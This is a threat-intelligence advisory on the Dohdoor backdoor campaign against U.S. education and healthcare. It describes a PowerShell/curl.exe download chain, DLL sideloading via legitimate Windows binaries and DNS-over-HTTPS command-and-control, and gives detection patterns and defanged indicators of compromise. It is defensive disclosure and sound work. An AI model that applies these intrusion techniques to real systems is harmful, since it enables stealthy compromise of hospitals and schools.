Stealthy Dohdoor Backdoor Campaign Targeting U.S. Education and Healthcare via DNS-over-HTTPS
March 10th, 2026
High
Our Cyber Threat Intelligence Unit is monitoring a stealthy malware campaign called Dohdoor that targets U.S. education and healthcare organizations. Security researchers recently reported this activity and linked it to threat cluster UAT-10027. Active since December 2025, the campaign uses DNS-over-HTTPS (DoH) to hide command-and-control (C2) traffic within encrypted web activity, allowing attackers to maintain persistent access and blend into normal network traffic. The attackers use deceptive subdomains that mimic Microsoft update services, with irregular capitalization and uncommon top-level domains to avoid detection. Researchers also observed the use of legitimate system utilities and DLL sideloading to maintain stealth. Although no confirmed data exfiltration has been reported, Dohdoor allows covert command execution, reflective payload delivery, and persistent backdoor access, posing long-term espionage and operational risks.
Technical Details
Threat Type: Backdoor Malware Campaign
Severity: High
Affected Environment: Windows Systems
Associated Threat Cluster: UAT-10027
Attack Chain Overview:
Initial Access: While the exact initial infection vector remains unconfirmed, researchers believe the campaign likely used social-engineering phishing techniques that led to the execution of a PowerShell-based downloader in targeted environments.
Execution and Delivery: Once initial execution is achieved, attackers deploy a multi-stage delivery chain:
PowerShell Execution: A PowerShell command invokes curl.exe to retrieve a malicious Windows batch script from attacker-controlled infrastructure.
Batch Script Deployment: The downloaded .bat or .cmd script creates a hidden working directory within locations such as:
C:\ProgramData
C:\Users\Public
Malicious DLL Delivery: The script downloads a malicious DLL disguised as legitimate Windows libraries, including:
propsys.dll
batmeter.dll
DLL Sideloading: The malicious DLL is executed using legitimate Windows binaries (Living-off-the-Land techniques), including:
Fondue.exe
mblctr.exe
ScreenClippingHost.exe
This approach allows attackers to execute malware while blending activity into legitimate operating system behavior.
Obfuscation and Evasion Techniques:
The campaign employs multiple stealth techniques designed to evade traditional detection controls:
Deceptive subdomains impersonating Microsoft update infrastructure
Mixed capitalization patterns within domain names
Use of uncommon top-level domains such as:
.online
.design
.software
Encrypted command-and-control communications via DNS-over-HTTPS
Use of legitimate Windows utilities for payload execution
Anti-forensic cleanup actions, including deletion of RunMRU history, clipboard clearing, and removal of temporary scripts
Post-Compromise Activity:
Once deployed, the Dohdoor backdoor enables the following attacker capabilities:
Persistent remote access to compromised Windows systems
Encrypted C2 communications via Cloudflare-backed DNS-over-HTTPS services
Execution of attacker-supplied commands
Download, decryption, and reflective execution of additional payloads
Deployment of follow-on tools such as Cobalt Strike Beacon
These capabilities enable adversaries to maintain covert long-term access and potentially conduct reconnaissance, credential harvesting, or follow-on intrusion activities.
Impact
Persistent Backdoor Access: Long-term unauthorized access to compromised systems.
Data Security Risks: Potential for credential harvesting, surveillance, and covert data exfiltration.
Operational Disruption: Healthcare and education systems may experience service disruption affecting clinical systems, research platforms, and academic infrastructure.
Regulatory Exposure: Potential exposure of personal, medical, or academic records may trigger compliance and legal obligations.
Reputational Damage: Data exposure or service interruptions could undermine institutional trust.
Detection Method
Security teams should monitor endpoint and network telemetry for behavioral indicators associated with this campaign:
Suspicious HTTPS Communications:
Persistent outbound HTTPS or DoH connections to newly registered or unfamiliar domains
Domains exhibiting irregular capitalization patterns that mimic legitimate services
Unusual encrypted traffic patterns inconsistent with normal organizational behavior
Suspicious PowerShell Activity: Monitor for abnormal PowerShell execution patterns, including:
Windows Event ID 4688 or Sysmon Event ID 1 showing powershell.exe spawning curl.exe
PowerShell commands retrieving remote scripts or executables
PowerShell Script Block Logging (Event ID 4104) containing external web requests
Abnormal Use of curl.exe:
Execution of curl.exe from user directories or temporary folders
Retrieval of .bat or .cmd files from external infrastructure
Encoded URLs embedded within PowerShell commands
Network Anomaly Monitoring:
Low-volume but persistent outbound connections to previously unseen domains
Traffic patterns consistent with command-and-control beaconing behavior
DNS-over-HTTPS usage originating from endpoints that do not normally utilize DoH services
Indicators of Compromise
Type | Indicator |
Domain | cjitdrpwnna[.]mswinsoftupdload[.]design |
Domain | lbandugzcfg[.]deepinspectionsystem[.]online |
Domain | lsypdqgxredfpx[.]mswinsoftupdload[.]design |
Domain | yhdjtylnsmwvuu[.]deepinspectionsystem[.]online |
Domain | sdxsiol[.]pnuisckmhwagzvdyjrlbeft[.]software |
Domain | ezqrvkfgejwctdnc[.]pnuisckmhwagzvdyjrlbeft[.]software |
Domain | txjiqslrrig[.]mswinsoftupdload[.]design |
Domain | qhtckzbxtkdvyr[.]mswinsoftupdload[.]design |
Domain | gitkzxd[.]pnuisckmhwagzvdyjrlbeft[.]software |
Domain | gppiwogwndiakkdu[.]pnuisckmhwagzvdyjrlbeft[.]software |
SHA256 | 54e18978c6405f56cd59ba55a62291436639f21cf325ae509f0599b15e8f7f53 |
SHA256 | 0bb130b1fafb17705d31fe5dd25e7b2d62176578609d75cc57911ef5582ef17a |
SHA256 | 54545fa3a2d8da6746021812ebaa9d26f33bba4f63c6f7f35caa6fa4ee8c0e6a |
SHA256 | 8e97c677aec905152f8a92fed50bb84ef2e8985d5c29330c5a05a4a2afcbd4a5 |
SHA256 | 800faaf15d5f42f2ab2c1d2b6b65c8a9e4def6dc10f6ce4e269dcf23f4e8dae2 |
SHA256 | b1bd8f7d4488977cca03954a57f5c8ad7bfd4609bcc3bae92326830fcbd3232c |
SHA256 | 2ce3e75997f89b98dd280d164a5f21f7565f4de26eed61243badde04b480700e |
Recommendations
Organizations should take the following actions to reduce risk:
Review EDR, firewall, DNS, and PowerShell logs for suspicious activity described in this advisory.
Ensure EDR solutions are capable of detecting abnormal PowerShell execution and unauthorized downloads.
Enable PowerShell logging, script block logging, and command-line auditing.
Restrict the use of curl.exe and other scripting utilities where not operationally required.
Implement network segmentation to limit lateral movement between user environments and critical systems.
Monitor for persistent outbound HTTPS or DoH communications to newly observed domains.
Secure privileged and administrative accounts with strong authentication controls.
Maintain isolated, tested backups to support rapid recovery if compromise occurs.
Educate users regarding phishing and suspicious download activity.
Conclusion
The Dohdoor campaign employs stealthy intrusion tactics targeting critical sectors, including healthcare and education. By leveraging encrypted communications, legitimate system utilities, and deceptive infrastructure, attackers can blend malicious activity into normal network traffic and maintain long-term access to compromised systems. We urge organizations to prioritize proactive monitoring, enhanced endpoint visibility, and strict access controls to detect and disrupt these stealth-oriented intrusion techniques before adversaries establish persistent access.
References
https://securereading.com/dohdoor-backdoor-healthcare-education/
https://gurucul.com/latest-threats/new-dohdoor-malware-campaign-targets-education-and-health-care/
https://thehackernews.com/2026/02/uat-10027-targets-us-education-and.html
https://blog.talosintelligence.com/new-dohdoor-malware-campaign/